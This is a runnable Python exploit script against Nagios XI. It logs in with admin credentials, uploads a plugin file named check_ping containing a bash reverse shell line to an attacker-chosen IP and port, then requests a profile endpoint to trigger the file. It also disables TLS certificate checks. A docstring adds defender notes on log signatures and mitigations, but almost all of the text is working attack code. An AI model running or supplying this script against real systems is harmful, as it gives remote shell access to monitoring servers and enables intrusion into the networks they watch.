#!/usr/bin/env python3
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
# Silence urllib3's InsecureRequestWarning. The warning exists because the
# session used by exploit() turns off TLS certificate verification; muting it
# hides the fact that the server's identity is never checked.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
def exploit(host, ssl, username, password, reverse_ip, reverse_port):
    """Run an authenticated plugin-upload proof of concept against Nagios XI.

    The flow needs a working account (``username``/``password``) that can open
    the admin plugin page. It logs in, uploads a file named ``check_ping``
    through ``admin/monitoringplugins.php`` and then requests the profile
    component's download endpoint, which the original author marks as the
    step that triggers the uploaded file.

    Defender notes: in web server logs the sequence shows up as a multipart
    POST to ``monitoringplugins.php`` followed by a GET to
    ``profile.php?cmd=download`` in the same session. The uploaded content
    makes the server open an outbound TCP connection to
    ``reverse_ip:reverse_port``, so unexpected egress from the monitoring host
    and a changed ``check_ping`` plugin file are the host-side indicators.
    Restricting the admin interface to management networks, strong admin
    credentials and integrity monitoring of the plugin directory limit the
    exposure.

    Args:
        host: Target host, placed directly after the scheme in the base URL.
        ssl: Truthy selects ``https``, falsy selects ``http``.
        username: Account name submitted to the login form.
        password: Password submitted to the login form.
        reverse_ip: Address written into the uploaded file's callback line.
        reverse_port: Port written into the uploaded file's callback line.

    Returns:
        None. Progress is reported on stdout only.
    """
    scheme = "http"
    if ssl:
        scheme = "https"
    base_url = f"{scheme}://{host}"

    http = requests.Session()
    # Certificate verification is off for every request on this session, so
    # the credentials below are sent without authenticating the server.
    http.verify = False

    def fetch_nsp(page_url):
        # Both forms carry a hidden ``nsp`` input (appears to be the
        # per-session form token - confirm against the product docs); the
        # value has to be echoed back with the POST.
        page = http.get(page_url)
        form_dom = BeautifulSoup(page.text, 'html.parser')
        return form_dom.find('input', {'name': 'nsp'})['value']

    # Step 1: authenticate through the normal login form.
    login_url = f"{base_url}/nagiosxi/login.php"
    login_form = {
        'username': username,
        'password': password,
        'pageopt': 'login',
        'nsp': fetch_nsp(login_url),
    }
    login_resp = http.post(login_url, data=login_form)
    # NOTE(review): only the HTTP status is inspected, so a rejected login
    # that still answers 200 is not detected here.
    if login_resp.status_code != 200:
        print("Login failed")
        return

    # Step 2: fetch the plugin management page for a fresh form token.
    plugin_url = f"{base_url}/nagiosxi/admin/monitoringplugins.php"
    upload_nsp = fetch_nsp(plugin_url)

    # Step 3: upload a one-line shell script under the name check_ping.
    shell_line = f"bash -i >& /dev/tcp/{reverse_ip}/{reverse_port} 0>&1"
    upload_files = {'uploadedfile': ('check_ping', shell_line, 'text/plain')}
    upload_fields = {
        'upload': '1',
        'nsp': upload_nsp,
        'MAX_FILE_SIZE': '20000000',
    }
    http.post(plugin_url, files=upload_files, data=upload_fields)

    # Step 4: request the profile download endpoint (the "trigger" step in
    # the original script). Neither this response nor the upload response is
    # checked, so the message below is printed regardless of the outcome.
    http.get(f"{base_url}/nagiosxi/includes/components/profile/profile.php?cmd=download")
    print("Exploit completed. Check your listener.")
if __name__ == "__main__":
    # Exactly six positional arguments are expected after the script name.
    cli_args = sys.argv[1:]
    if len(cli_args) != 6:
        print("Usage: python3 exploit.py <host> <ssl> <user> <password> <reverse_ip> <reverse_port>")
        print("Example: python3 exploit.py 192.168.175.136 false nagiosadmin admin 192.168.45.213 4444")
        sys.exit(1)

    target, tls_flag, user, secret, callback_ip, callback_port = cli_args
    # Only the literal word "true" (any letter case) selects https; every
    # other value falls back to plain http.
    use_tls = tls_flag.lower() == 'true'
    exploit(target, use_tls, user, secret, callback_ip, callback_port)